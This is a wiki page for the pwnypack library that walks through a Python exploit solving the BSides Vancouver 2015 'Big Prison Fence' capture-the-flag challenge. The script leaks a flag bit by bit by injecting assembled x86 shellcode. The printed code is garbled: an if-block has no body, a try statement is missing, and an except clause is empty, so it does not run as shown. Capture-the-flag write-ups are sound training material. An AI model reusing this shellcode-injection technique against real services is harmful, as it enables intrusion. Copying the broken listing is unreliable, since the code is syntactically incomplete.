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Big Prison Fence

Ingmar Steen edited this page Mar 21, 2015 · 8 revisions

This example demonstrates how to use pwnypack to capture the flag of the Vancouver BSides CTF 2015 'Big Prison Fence' challenge.

#! /usr/bin/env python

from __future__ import print_function

from pwny import *
target.arch = Architecture.x86

def leak_byte(offset):
    v = 0
    for bit in range(8):
        while True:
            f = Flow.execute('./bigpf')
            # f = Flow.connect_tcp('', 49782)

            f.until(b'NAME PROGRAM\n')
            f.writeline(b'A' * 32)
            line = f.readline().strip()
            if len(line) != 45:
                # address contained a nul byte, retry.
            flag_addr = U(line[-4:])

            program = asm('''
                mov   eax,        %d
                mov   ebx,        0
                test  byte [eax], %d
                sete  bl
                mov   eax,        1
                int   0x80
            ''' % (flag_addr + offset, 1 << bit))

            f.until(b'LOAD PROGRAM\n')
            f.write(P32(len(program)) + program, echo=False)

                f.until(b'THANK YOU\n')
                v |= 1 << bit
            except EOFError:


    return chr(v)

flag = c = ''
o = len(flag)
while c != '\0':
    flag += c
    c = leak_byte(o)
    o += 1

print('Here is the flag:', flag)
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